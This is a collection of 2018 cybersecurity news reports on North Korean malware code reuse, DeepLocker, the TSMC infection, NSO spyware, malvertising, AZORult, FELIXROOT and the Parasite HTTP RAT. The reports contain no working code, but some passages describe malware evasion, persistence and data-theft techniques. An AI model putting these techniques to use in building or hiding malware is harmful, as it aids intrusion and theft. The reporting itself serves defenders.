The three malware were associated with the APT group tracked as Group 123 (also tracked as Reaper, APT37, and ScarCruft).
The researchers also found a similarity in the source code of the Brambul malware (2009) and KorDllBot (2011).
“The third example, responsible for launching a cmd.exe with a net share, has been seen in 2009’s Brambul, also known as SierraBravo, as well as KorDllBot in 2011. These malware families are also attributed to the Lazarus group.” states the report.
The experts also discovered a connection between the Tapaoux (or DarkHotel) malware family and samples involved in the Operation Troy.
The analysis of the code reuse conducted by the experts confirmed that most of the samples attributed to North Korea-linked APT group Lazarus presented many similarities. The only malware that appears different are the RATs involved in the operations attributed to Group 123 APT group.
“The malware attributed to the group Lazarus has code connections that link many of the malware families spotted over the years. Lazarus is a collective name for many DPRK cyber operations, and we clearly see links between malware families used in different campaigns,” the researchers concluded.
“We clearly saw a lot of code reuse over the many years of cyber campaigns we examined. This indicates the North Koreans have groups with different skills and tools that execute their focused parts of cyber operations while also working in parallel when large campaigns require a mix of skills and tools.” concluded the experts.
Researchers Say Code Reuse Links North Korea's Malware
10.8.2018 securityweek Virus
Following trails of reused code, security researchers at Intezer and McAfee have uncovered new links between malware families attributed to North Korean threat groups and tracked most of the samples to the infamous Lazarus Group.
Code reuse isn’t novel, and many cases where cybercriminals and threat actors employed this technique have been already reported on. In fact, actors operating from the same country have been often observed sharing malware code and infrastructure, which often makes attribution highly problematic.
For security researchers, the reuse of code between different malware families and variations and between one campaign to another means that they can gain insight into the activities of threat actors, and this is exactly what Intezer and McAfee focused on in their recent analysis.
The multiple cyber campaigns attributed to North Korean hackers have been so far focused on two different directions: to raise money or pursue nationalist aims.
Thus there’s a workforce of hackers that focuses on cybercrime activities such as hacking into financial institutions (Unit 180) and another to gather intelligence from other nations and to try to disrupt rival states and military targets (Unit 121).
The researchers focused on the latter and discovered “many overlaps in code reuse,” which led them to the conclusion that nation-state sponsored groups were active in those efforts.
After analyzing thousands of malware samples, many unclassified or uncategorized, the researchers noticed a “significant amount of code similarities between almost every one of the attacks associated with North Korea.”
One similarity was found in the server message block (SMB) module of WannaCry (2017), Mydoom (2009), Joanap, and DeltaAlfa.
The use of these malware families has been already attributed to the Lazarus Group, which is tracked by the U.S. government as Hidden Cobra.
Believed to have orchestrated the $81 million heist from the Bangladesh bank, and seen as the most serious threat to banks, the group is also said to have launched campaigns such as Operation Blockbuster, Dark Seoul, and Operation Troy.
The researchers also noticed a similarity between three different remote access Trojans, namely NavRAT, Gold Dragon, and a DLL from the South Korean gambling hacking campaign, all three believed to be affiliated with Group 123 (also tracked as Reaper, APT37, and ScarCruft).
There’s also a connection between the Brambul malware (2009) and KorDllBot (2011), based on code responsible for launching a cmd.exe with a net share. Both malware families are attributed to Lazarus.
The security researchers also discovered a connection between the Tapaoux (or DarkHotel) malware family and samples from Operation Troy.
The code reuse and sharing between various threat groups known to be affiliated with North Korea has revealed that most malware families link back to Lazarus. The only malware that stands apart are the RATs attributed to Group 123, which are linked to one another.
“The malware attributed to the group Lazarus has code connections that link many of the malware families spotted over the years. Lazarus is a collective name for many DPRK cyber operations, and we clearly see links between malware families used in different campaigns,” the security researchers note.
On Thursday, the U.S. Department of Homeland Security (DHS) warned of a new malware variant dubbed KEYMARBLE, which the U.S. government has attributed to malicious cyber activity by the North Korean government. DHS says the malware is a Remote Access Trojan (RAT) capable of accessing device configuration data, downloading additional files, executing commands, modifying the registry, capturing screenshots, and exfiltrating data. More details on KEYMARBLE are available from the malware report (AR18-221A) from the DHS.
DeepLocker – AI-powered malware are already among us
10.8.2018 securityaffairs Virus
Security researchers at IBM Research developed a “highly targeted and evasive” AI-powered malware dubbed DeepLocker and will present today.
What about Artificial Intelligence (AI) applied in malware development? Threat actors can use AI-powered malware to create powerful malicious codes that can evade sophisticated defenses.
Security researchers at IBM Research developed a “highly targeted and evasive” attack tool powered by AI,” dubbed DeepLocker that is able to conceal its malicious intent until it has infected the specific target.
“IBM Research developed DeepLocker to better understand how several existing AI models can be combined with current malware techniques to create a particularly challenging new breed of malware.” reads a blog post published by the experts.
“This class of AI-powered evasive malware conceals its intent until it reaches a specific victim. It unleashes its malicious action as soon as the AI model identifies the target through indicators like facial recognition, geolocation and voice recognition.”
According to the IBM researcher, DeepLocker is able to avoid detection and activate itself only after specific conditions are matched.
AI-powered malware represents a privileged optional in high-targeted attacks like the ones carried out by nation-state actors.
The malicious code could be concealed in harmful applications and select the target based on various indicators such as voice recognition, facial recognition, geolocation and other system-level features.
“DeepLocker hides its malicious payload in benign carrier applications, such as a video conference software, to avoid detection by most antivirus and malware scanners.” continues IBM.
“What is unique about DeepLocker is that the use of AI makes the “trigger conditions” to unlock the attack almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model.”
The researchers shared a proof of concept by hiding the WannaCry ransomware in a video conferencing app and keeping it stealth until the victim is identified through the facial recognition. Experts pointed out that the target can be identified by matching his face with publicly available photos.
“To demonstrate the implications of DeepLocker’s capabilities, we designed a proof of concept in which we camouflage a well-known ransomware (WannaCry) in a benign video conferencing application so that it remains undetected by malware analysis tools, including antivirus engines and malware sandboxes. As a triggering condition, we trained the AI model to recognize the face of a specific person to unlock the ransomware and execute on the system.”
“Imagine that this video conferencing application is distributed and downloaded by millions of people, which is a plausible scenario nowadays on many public platforms. When launched, the app would surreptitiously feed camera snapshots into the embedded AI model, but otherwise behave normally for all users except the intended target,” the researchers added.
“When the victim sits in front of the computer and uses the application, the camera would feed their face to the app, and the malicious payload will be secretly executed, thanks to the victim’s face, which was the preprogrammed key to unlock it.”
The IBM Research group will provider further details today more details in a live demo at the Black Hat USA security conference in Las Vegas.
Malware Hits Plants of Chip Giant TSMC
6.8.2018 securityweek Virus
A piece of malware has caused significant disruptions in the factories of Taiwan Semiconductor Manufacturing Company (TSMC), the world’s biggest contract chipmaker.
TSMC’s most important customer is Apple, whose iPhone and iPad products use TSMC chips, but the company also supplies semiconductors to Qualcomm, Nvidia, AMD, MediaTek and Broadcom.
In a statement published on its website on Sunday, the company described the incident as a “computer virus outbreak” that impacted an unspecified number of computer systems and fabrication tools in Taiwan.
The infection was discovered on August 3 and the semiconductor foundry said it had restored 80 percent of systems by August 5, with a full recovery expected by August 6.
The company expects the incident to have a significant impact on its revenue for the third quarter. Financial Times reported that its revenue will take a hit of roughly $255 million.
“TSMC expects this incident to cause shipment delays and additional costs. We estimate the impact to third quarter revenue to be about three percent, and impact to gross margin to be about one percentage point. The Company is confident shipments delayed in third quarter will be recovered in the fourth quarter 2018, and maintains its forecast of high single-digit revenue growth for 2018 in U.S. dollars given on July 19, 2018,” TSMC stated.
“Most of TSMC’s customers have been notified of this event, and the Company is working closely with customers on their wafer delivery schedule. The details will be communicated with each customer individually over the next few days,” the company added.
According to TSMC, the malware made its way onto the network due to “misoperation” during the installation of a new tool. The company said the incident did not affect data integrity and it did not result in confidential information getting compromised.
A malware paralyzed TSMC plants where also Apple produces its devices
5.8.2018 securityweek Virus
A virus has infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, the plants where Apple produces its devices
A malware has infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, the iPhone chipmaker plans.
TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc.
According to Bloomberg that first reported the news, the infection caused one of the most severe disruptions suffered by the company as it ramps up chipmaking for Apple Inc.’s next iPhones.
The company contained the problem, but some of the affected plants will not able to restart before Sunday.
“The sole maker of the iPhone’s main processor said a number of its fabrication tools had been infected, and while it had contained the problem and resumed some production, several of its factories won’t restart till at least Sunday. The virus wasn’t introduced by a hacker, the company added in a statement.” states the Bloomberg.
“Certain factories returned to normal in a short period of time, and we expect the others will return to normal in one day,” the company said in its Saturday statement.
This is the first time that a malware cripples a TSMC facility paralyzing the production, according to the company “the degree of infection varied from factory to factory.”
“TSMC has been attacked by viruses before, but this is the first time a virus attack has affected our production lines,” Chief Financial Officer Lora Ho told Bloomberg News by phone.
The economic impact of this kind of incidents could be severe, at the time there is no info about losses caused by the attack on the Taiwanese firm.
At the time it is not possible to estimate the potential effects on the production of Apple devices, “the implications are also unclear for Apple.”
“The incident comes weeks after TSMC cheered investors with a rosy outlook for smartphone demand in the latter half of the year. That helped the market look past a reduced revenue outlook.” reported Bloomberg.
“A bellwether for the chip industry as well as an early indicator of iPhone demand, it heads into its busiest quarters grappling with waning enthusiasm for the high-powered chips used to mine digital currencies. Chief Executive Officer C. C. Wei had said TSMC’s sales will rise this year by a high single-digit percentage in U.S. dollar terms, down from an already reduced projection of about 10 percent”
FireEye MalwareGuard Uses Machine Learning to Detect Malware
2.8.2018 securityweek Virus
FireEye on Tuesday announced the launch of MalwareGuard, an engine that leverages machine learning (ML) to detect malware and prevent it from executing.
MalwareGuard has been added to FireEye’s Endpoint Security product and the firm will also be deploying the new engine to its Network Security and Email Security solutions.
The engine is designed to predict whether a Windows executable file is malicious, prior to its execution. MalwareGuard should be able to detect both known malware and zero-day threats, FireEye said.
MalwareGuard is based on two years of research conducted by the company, which included assembling a dataset of more than 300 million samples and using it to train the engine. During its internal evaluation, which involved testing in real-world incident response cases, FireEye made predictions on over 20 million executable files.
“During the internal evaluation period, we also developed the infrastructure to support long-term tracking and maintenance for MalwareGuard,” FireEye said in a blog post. “Our goal was and is to have real-time visibility into the model’s performance, with the expectation that model retraining could be done on demand when performance dips below a threshold. To meet this objective, we developed data pipelines for each phase of the ML process, which makes the system fully automatable.”
The company’s blog post includes details on the goals, development, and testing of MalwareGuard.
In addition to MalwareGuard, FireEye informed customers that its Endpoint Security solution now includes new features designed to provide improved management capabilities and enable organizations to rapidly respond to important alerts.
MalwareGuard and the other new features have been added to the latest version of FireEye Endpoint Security, specifically version 4.5.
Human Rights Group: Employee Targeted With Israeli Spyware
2.8.2018 securityweek Virus
LONDON (AP) — An Amnesty International employee has been targeted with Israeli-made surveillance software, the human rights group said Wednesday, adding to a growing number of examples of Israeli technology being used to spy on human rights workers and opposition figures in the Middle East and beyond.
In a 20-page report, Amnesty outlined how it thinks a hacker tried to break into an unidentified staff member's smartphone in early June by baiting the employee with a WhatsApp message about a protest in front of the Saudi Embassy in Washington.
The London-based human rights organization said it traced the malicious link in the message to a network of sites tied to the NSO Group, an Israeli surveillance company implicated in a series of digital break-in attempts, including a campaign to compromise proponents of a soda tax in Mexico and an effort to hack into the phone of an Arab dissident that prompted an update to Apple's operating system.
Joshua Franco, Amnesty's head of technology and human rights, said the latest hacking attempt was emblematic of the increased digital risk faced by activists worldwide.
"This is the new normal for human rights defenders," Franco said.
NSO said in a written statement that its product was "intended to be used exclusively for the investigation and prevention of crime and terrorism" and that allegations of wrongdoing would be investigated. In response to a series of written questions, the company said past allegations of customer misuse had, in an undisclosed number of cases, led to the termination of contracts.
Amnesty's findings were corroborated by internet watchdog Citizen Lab, which has been tracking NSO spyware for two years and is based at the University of Toronto's Munk School of Global Affairs.
In its own report being released Wednesday, Citizen Lab said it so far had counted some 175 targets of NSO spyware worldwide, including 150 people in Panama identified as part of a massive domestic espionage scandal swirling around the country's former president.
The Amnesty International report said the organization identified a second human rights activist, in Saudi Arabia, who was targeted in a similar way to its staffer. Citizen Lab said it found traces of similar hacking attempts tied to Qatar or Saudi, hinting at the use of the Israeli spyware elsewhere in the Gulf.
Any possible use of Israeli technology to police dissent in the Arab world could raise uncomfortable questions both for Israel, which still sees itself as a bastion of democracy in the region, and for countries with no formal diplomatic ties to the Jewish state.
For Amnesty's Franco, it was a sign of an out-of-control trade in high-tech surveillance tools.
"This is a huge market that's completely opaque and under-regulated," he said.
Amnesty International employee targeted with NSO group surveillance malware
2.8.2018 securityweek Virus
An employee at Amnesty International has been targeted with Israeli surveillance malware, the news was revealed by the human rights group.
Amnesty International revealed that one of its employees was targeted with a surveillance malware developed by an Israeli firm.
The human rights group published a report that provides details on the attack against its employee. The hacker attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.
This SMS message translates to:
“Court order #XXXXXX issued against identity owner **** on XX/XX/XXX”
[link]”
The organization added that such kind of attacks is becoming even more frequent, a growing number of Israeli surveillance software being used to spy on human rights operators and opposition figures in the Middle East and beyond.
Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.
“In June 2018, an Amnesty International staff member received a malicious WhatsApp message with Saudi Arabia-related bait content and carrying links Amnesty International believes are used to distribute and deploy sophisticated mobile spyware. Through the course of our subsequent investigation we discovered that a Saudi activist based abroad had also received similar malicious messages.” reads the report published Amnesty International.
“In its analysis of these messages, Amnesty International found connections with a network of over 600 domain names. Not only are these domain names suspicious, but they also overlap with infrastructure that had previously been identified as part of Pegasus, a sophisticated commercial exploitation and spyware platform sold by the Israel surveillance vendor, NSO Group.”
The servers identified by the experts were matching NSO Group’s description of Pegasus in the Hacking Team leaked document, they found two other connections to NSO Group:
evidence that connects the malicious links used by the attackers and collected with NSO Group network infrastructure that was previously detailed by researchers at Citizen Lab.
a domain registration pattern showing that most of the domains in the NSO Group infrastructure were registered during Israeli working days and hours.
“With the technique we developed, we were then able to identify over 600 servers that demonstrated similar behavior. Among these we found servers that hosted domain names that have been previously identified as connected to NSO Group by Citizen Lab and others, specifically banca-movil[.]com, pine-sales[.]com, and ecommerce-ads[.]org.” continues the report.
There are several companies that develop surveillance platforms for targeting mobile devices, the NSO Group operated in the dark for several years, until the researchers from the Citizenlab organization and the Lookout firm spotted its software in targeted attacks against UAE human rights defender, Ahmed Mansoor.
The researchers also spotted other attacks against a Mexican journalist who reported to the public a story of the corruption in the Mexican government.
NSO replied that its surveillance solution was “intended to be used exclusively for the investigation and prevention of crime and terrorism.”
People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.
Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.
Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.
The traces collected by Amnesty International was corroborated by the findings of the investigation conducted by researchers at the internet watchdog Citizen Lab.
“Amnesty International shared the suspicious messages with us and asked us to verify their findings, as we have been tracking infrastructure that appears to be related to NSO Group’s Pegasus spyware since March 2016.” reads the analysis published by Citizen Lab.
“Based on our analysis of the messages sent to these individuals, we can corroborate Amnesty’s findings that the SMS messages contain domain names pointing to websites that appear to be part of NSO Group’s Pegasus infrastructure.”
Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.
COUNTRY NEXUS REPORTED CASES OF INDIVIDUALS TARGETED YEAR(S) IN WHICH SPYWARE INFECTION WAS ATTEMPTED
Panama Up to 150 (Source: Univision)1 2012-2014
UAE 1 (Source: Citizen Lab) 2016
Mexico 22 (Source: Citizen Lab) 2016
Saudi Arabia 2 (Source: Amnesty, Citizen Lab) 2018
Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.
According to Joshua Franco, Amnesty’s head of technology and human rights, recent discovery demonstrates that trading of surveillance software is going out-of-control.
“This is a huge market that’s completely opaque and under-regulated,” he concluded.
Advanced Malvertising Campaign Exploits Online Advertising Supply Chain
31.7.2018 securityweek Exploit Virus
Malvertising Campaign Steals Traffic From 10,000 Hacked WordPress Sites and Exploits the Online Advertising Supply Chain
Malvertising is neither a new nor insignificant threat -- nor is there any easy solution to stop it. It is the abuse of the online advertising industry to deliver malware disguised as or hidden within seemingly innocuous advertisements.
Researchers at Check Point have discovered what they describe as the infrastructure and methods used in a large ‘malvertising’ and banking Trojan campaign, which delivers malicious adverts to millions worldwide through the HiBids online advertising platform.
The campaign starts with a threat actor that Check Point describes as 'Master134'. He sold stolen web traffic from 10,000 hacked WordPress sites to, say the researchers, "AdsTerra, the real time bidding (RTB) ad platform, who then sold it to Resellers (ExoClick, AdKernel, EvoLeads and AdventureFeeds)."
The researchers told SecurityWeek, "The traffic is stolen from the compromised WordPress sites via a known exploit on that platform, which enables the actor to insert a redirection to his malicious infrastructure."
Once this traffic has passed through AdsTerra, the resellers sell it to the highest bidding advertiser. Unfortunately, the return value on malware distribution is (almost) immediate via malwares such as ransomwares, miners, and banking trojans. Due to the large return on those malwares, malicious actors can usually afford to out-bid legitimate publishers.
"In this way," say the researchers, "cyber criminals are abusing the online advertising ecosystem, using it to bid alongside legitimate advertisers, like Nike or Coca Cola, but placing higher bids in order to have the ad-networks select their malware-laden ads to display on thousands of publishers’ websites instead of clean, legitimate ads."
Check Point does not provide details of the malware being distributed through this particular campaign, nor any of the publications that receive and unwittingly transmit the malware to innocent visitors. It merely states, "The ads often contain malicious code that exploits unpatched vulnerabilities in browsers or browser plug-ins, such as Adobe’s Flash Player, so that the user gets infected by ransomware, keyloggers, and other types of malware simply by visiting a site hosting the malicious link."
Luis Corrons, security evangelist at Avast, told SecurityWeek that past malvertising campaigns "have affected some of the biggest news sites, such as The New York Times, Huffington Post, Forbes, The Daily Mail and more. In order to go undetected, some of these attacks just last a few seconds each wave, to make it harder to track the source of the infection. JavaScript Monero miner even got to YouTube through an ad network last January."
SecurityWeek asked AdsTerra for a comment on malvertising and the Check Point report, but we have so far received no reply to our email. Of the two telephone numbers we were able to find, one is a mobile number (supposedly in Singapore) that was switched off, while the other (supposedly in Gibraltar) just terminated. AdsTerra, according to its website, is headquartered in Limassol, Cyprus; while Europages lists an address in Gibraltar.
Online advertiser reviews, however, provide a glowing endorsement for the organization; with one saying that AdsTerra is particularly strong on popunder adverts. Popunders are among the sneakiest of advertisements. Rather than run the risk of being closed by the user as soon as it is seen, popunders open in a new window underneath the current browser window and remain unseen until the focus window is closed. "That’s one of the main streams of malvertising," Check Point told SecurityWeek.
There is no easy defense against malvertising. Ad blockers work, but more and more publishers are blocking access to their pages when they detect a blocker. Users must either pay a subscription for no adverts, accept they cannot view the page they want, or receive the adverts that could potentially contain malware or malicious links.
Greater responsibility -- perhaps even legal liability -- on the advertiser would help. Corrons suggests, "A content check should be performed by the ad network (on both the advertisements and the landing pages)." He would also like to see greater active monitoring, background checking on the publishers, and legal contracts with high fines if the content is not secure.
Little of this currently happens. "Due to the really fast transactions, and the sheer volume of advertisements, we believe that there is no real-time monitoring by humans," Check Point told SecurityWeek. "Resellers need to know that their customers are 'bad guys', but most of them preform no vetting of their customers."
Trusting to luck is not a good security defense; but it seems that the most many users can do against malvertising is use an ad blocker, maintain an up-to-date anti-virus solution, minimize local vulnerabilities with judicious patching -- and trust to luck when all else fails.
A new sophisticated version of the AZORult Spyware appeared in the wild
31.7.2018 securityaffairs Virus
A new sophisticated version of the AZORult Spyware was spotted in the wild, it was involved in a large email campaign on July 18
Malware researchers at Proofpoint spotted a new version of the AZORult Spyware in the wild, it was involved in a large email campaign on July 18, just 24 hours it appeared in cybercrime forums on the Dark Web.
Attackers sent out thousands of messages targeting North America. The messages used employment-related subjects such as “About a role” and “Job Application,” while the malicious attached documents used file names in the format of “firstname.surname_resume.doc”.
“AZORult is a robust information stealer & downloader that Proofpoint researchers originally identified in 2016 as part of a secondary infection via the Chthonic banking Trojan. We have since observed many instances of AZORult dropped via exploit kits and in fairly regular email campaigns as both a primary and secondary payload.” reads the analysis published by ProofPoint.
“Recently, AZORult authors released a substantially updated version, improving both on its stealer and downloader functionality.”
AZORult is a data stealer that was first spotted in 2016 by Proofpoint that discovered it was it was part of a secondary infection via the Chthonic banking trojan. Later it was involved in many malspam attacks, but only now the authors released a substantially updated variant.
The latest version appears more sophisticated than previous ones, it implements the ability to steal histories from browsers (except IE and Edge), it includes a conditional loader that checks certain parameters before running the malicious code, and includes the support for Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC cryptocurrency wallets.
Below the full change log:
UPD v3.2
[+] Added stealing of history from browsers (except IE and Edge)
[+] Added support for cryptocurrency wallets: Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC
[+] Improved loader. Now supports unlimited links. In the admin panel, you can specify the rules for how the loader works. For example: if there are cookies or saved passwords from mysite.com, then download and run the file link[.]com/soft.exe. Also there is a rule “If there is data from cryptocurrency wallets” or “for all”
[+] Stealer can now use system proxies. If a proxy is installed on the system, but there is no connection through it, the stealer will try to connect directly (just in case)
[+] Reduced the load in the admin panel.
[+] Added to the admin panel a button for removing “dummies”, i.e. reports without useful information
[+] Added to the admin panel guest statistics
[+] Added to the admin panel a geobase
The conditional loader allows the attackers to infect only systems with specific characteristics, for example, it can check if certain desired cookies or saved passwords from specific sites are present on the victim’s machine,
After the malware has successfully connected the C&C server, it will send back to it the following files:
Next, after the initial exchange between the infected machine and the C&C server, the infected machine sends a report containing the stolen information. Again the report is XOR-encoded with the same 3-byte key; a portion of the decoded version is shown in Figure 5. The stolen information is organized into sections:
info: basic computer information such as Windows version and computer name
pwds: this section contains stolen passwords (not confirmed)
cooks: cookies or visited sites
file: contents of the cookies files and a file containing more system profiling information including machine ID, Windows version, computer name, screen resolution, local time, time zone, CPU model, CPU count, RAM, video card information, process listing of the infected machine, and software installed on the infected machine.
Once completed this phase, AZORult may download the next-stage payload.
The experts attributed the campaign to the TA516 threat actor that was focused on cryptocurrencies.
“As in legitimate software development, malware authors regularly update their software to introduce competitive new features, improve usability, and otherwise differentiate their products.” said ProofPoint.
“The recent update to AZORult includes substantial upgrades to malware that was already well-established in both the email and web-based threat landscapes. It is noteworthy that within a day of the new update appearing on underground forums, a prolific actor used the new version in a large email campaign, leveraging its new capabilities to distribute Hermes ransomware.”
Experts noticed that the infection process requests a significant users’ interaction to avoid antivirus. The victims would have to download the document that is password-protected, only after providing the password in a pop-up box included in the body of the email, the attack starts by requesting users to enable macros.
The macros download AZORult, which in turn downloads the Hermes 2.1 ransomware.
“AZORult malware, with its capabilities for credential and cryptocurrency theft, brings potential direct financial losses for individuals as well as the opportunity for actors to establish a beachhead in affected organizations,” concluded the experts.
Office Vulnerabilities Chained to Deliver Backdoor
30.7.2018 securityweek Vulnerebility Virus
A recently observed malicious campaign is abusing two chained Office documents, each exploiting a different vulnerability, to deliver the FELIXROOT Backdoor, FireEye reports.
The attack starts with a lure RTF document claiming to contain seminar information on environmental protection. When opened, it attempts to exploit CVE-2017-0199 to download a second stage payload, which is a file weaponized with CVE-2017-11882 (the Equation Editor vulnerability).
Upon successful infection, the FELIXROOT loader component is dropped onto the victim’s machine, along with an LNK file that points to %system32%\rundll32.exe. The LNK file, which contains the command to execute the loader component of FELIXROOT, is moved to the startup directory.
The embedded backdoor component, which is encrypted using custom encryption, is decrypted and loaded directly in memory. The malware has a single exported function.
Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If so, it performs an initial system triage before launching command and control (C&C) network communications.
In addition to gathering a variety of system information, the malware also reads registry entries for potential administration escalation and proxy information.
Based on received commands, the backdoor can fingerprint the infected machine, drop a file and execute it, launch remote shell, terminate connection to the C&C, download and run batch script, download file, and upload file.
Communication with the C&C server is performed over HTTP and HTTPS. Sent data is encrypted using AES encryption and arranged in a custom structure.
The malware contains several commands for specific tasks. Once it has executed all tasks, it clears all the footprints from the targeted machine, by deleting the LNK file, created registry keys, and the dropper components.
“CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected,” FireEye notes.
FELIXROOT Backdoor is back in a new fresh spam campaign
30.7.2018 securityaffairs Virus Spam
Security experts from FireEye have spotted a new spam campaign leveraging the FELIXROOT backdoor, a malware used for cyber espionage operation.
The FELIXROOT backdoor was first spotted by FireEye in September 2017, when attackers used it in attacks targeting Ukrainians.
The new spam campaign used weaponized documents claiming to provide information on a seminar on environmental protection efforts.
The documents include code to exploit known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary.
Experts reported that the lure documents used in the last campaign were written in the Russian language. The weaponized document exploits the CVE-2017-0199 flaw to download a second-stage payload that triggers the CVE-2017-11882 vulnerability to drop and execute the final backdoor.
“FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine.” reads the analysis published by FireEye.
“After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function,”
The CVE-2017-0199 allows the attackers to download and execute a Visual Basic script containing PowerShell commands when the victim opens the lure document.
The CVE-2017-11882 is remote code execution vulnerability that allows the attacker to run arbitrary code in the context of the current user.
This backdoor implements a broad a range of features, including the target fingerprinting via Windows Management Instrumentation (WMI) and the Windows registry, remote shell execution, and data exfiltration.
Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1.
If the backdoor was launched by RUNDLL32.exe with parameter #1 it makes an initial system triage before connecting to the command-and-control (C2). The malicious code uses Windows API to get the system information (i.e. computer name, username, volume serial number, Windows version, processor architecture and so on).
The FELIXROOT backdoor is able to communicate with its Command and Control server via HTTP and HTTPS POST protocols. The traffic to the C2 is encrypted with AES and converted into Base64.
“FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server” continues the analysis.
“Strings in the backdoor are encrypt1ed using a custom algorithm that uses XOR with a 4-byte key.”
The experts believe that this backdoor is a dangerous threat but was involved at the time in massive campaigns.
FELIXROOT backdoor contains several commands that allow it to execute specific tasks. Once executed a command, the malicious code will wait for one minute before executing the next one.
“Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine” continues FireEye.
Deletes the LNK file from the startup directory.
Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open
Deletes the dropper components from the system.
Further details, including the IoCs are reported in the analysis published by FireEye.
Mysterious snail mail from China sent to US agencies includes Malware-Laden CD
30.7.2018 securityaffairs Virus
Several U.S. state and local government agencies have reported receiving suspicious letters via snail mail containing malware-laden CD
Crooks and cyberspies attempt to exploit any attack vector to compromise the targeted computers and the case we are going to discuss demonstrate it.
The popular security expert Brian Krebs reported that several U.S. state and local government agencies have reported receiving suspicious letters via snail mail containing malware-laden compact discs (CDs).
The list of recipients that received the malicious snail mail includes State Archives, State Historical Societies, and a State Department of Cultural Affairs.
KrebsOnSecurity reported having learned that the strange mail is apparently sent from China.
“This particular ruse, while crude and simplistic, preys on the curiosity of recipients who may be enticed into popping the CD into a computer. According to a non-public alert shared with state and local government agencies by the Multi-State Information Sharing and Analysis Center (MS-ISAC), the scam arrives in a Chinese postmarked envelope and includes a “confusingly worded typed letter with occasional Chinese characters.”” reads the post published by Brian Krebs.
The attackers clearly attempt to exploit the curiosity of the potential victims that may be enticed into seeing the content of the CD.
According to the experts at MS-ISAC who analyzed the CDs, the media support contain Mandarin language Microsoft Word documents, some of which including malicious scripts.
All the letters received by the organizations appear to be addressed specifically to them.
“It’s not clear if anyone at these agencies was tricked into actually inserting the CD into a government computer.” continues Krebs.
“I’m sure many readers could think of clever ways that this apparent mail-based phishing campaign could be made more effective or believable, such as including tiny USB drives instead of CDs, or at least a more personalized letter that doesn’t look like it was crafted by someone without a mastery of the English language.”
A similar attack technique has been already observed in the wild, in September 2016 the Police in the Australian State of Victoria issued a warning to the local population of malware-laden USB drives left in letterboxes.
In August 2016, at Black Hat USA, the security researcher Elie Bursztein demonstrated the dangers of found USB drive and how to create a realistic one.
The expert dropped 297 USB drives on the University of Illinois Urbana-Champaign campus in six different locations, the devices are able to take over the PC of the unaware user that will find the key.
48 percent of USB drives were picked up by passers and plugged into a computer, and the unaware users also tried to open the file within.
Social engineering attacks demonstrate that humans are the weakest link in the security chain, and attacks leveraging malware-laden CD leverage bad habit.
Parasite HTTP RAT Packs Extensive Protection Mechanisms
28.7.2018 securityweek Virus
A newly discovered remote access Trojan (RAT) dubbed Parasite HTTP includes a broad range of protections, including sandbox detection, anti-debugging, anti-emulation, and more, Proofpoint reports.
Dubbed Parasite HTTP, the malware is being advertised on an underground forum and has already been used in an infection campaign. Courtesy of a modular architecture, the malware’s capabilities can be expanded with the addition of new modules after infecting a system.
The threat was recently used in a small email campaign targeting recipients primarily in the information technology, healthcare, and retail industries. The emails contained Microsoft Word attachments with malicious macros designed to download the RAT from a remote site.
Written in C, the tool is advertised as having no dependencies, a small size of around 49Kb, and plugin support. Moreover, its author claims the malware supports dynamic API calls, has encrypted strings, features a secure command and control (C&C) panel written in PHP, can bypass firewalls, and features encrypted communications.
Among other features, the author also advertises a series of plugins for the malware, including User management, Browser password recovery, FTP password recovery, IM password recovery, Email password recovery, Windows license keys recovery, Hidden VNC, and Reverse Socks5 proxy.
“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” Proofpoint says.
In addition to string obfuscation, Parasite HTTP features a sleep routine to delay execution and check for sandboxes or emulation. It first checks if an exception handler has run, then checks “whether between 900ms and two seconds elapsed in response to the routine’s 1 second sleep split into 10ms increments.”
When detecting a sandbox, the malware does not simply exit or throw an error, but attempts to make it more difficult to determine why it crashed. The RAT also uses code from a public repository for sandbox detection.
“Parasite HTTP also contains a bug caused by its manual implementation of a GetProcAddress API that results in the clearing code not executing,” Proofpoint's security researchers warn.
On Windows 7 and newer versions, the threat resolves critical APIs for creating its registry values. It also uses a process injection technique that isn’t used by major malware families.
The malware includes an obfuscated check for debugger breakpoints within a range of its own code. Parasite HTTP also removes hooks on a series of DLLs, but only restores the first 5 bytes to the original, which would likely result in a crash if a sandbox is using an indirect jump (6 bytes) for its hooks.
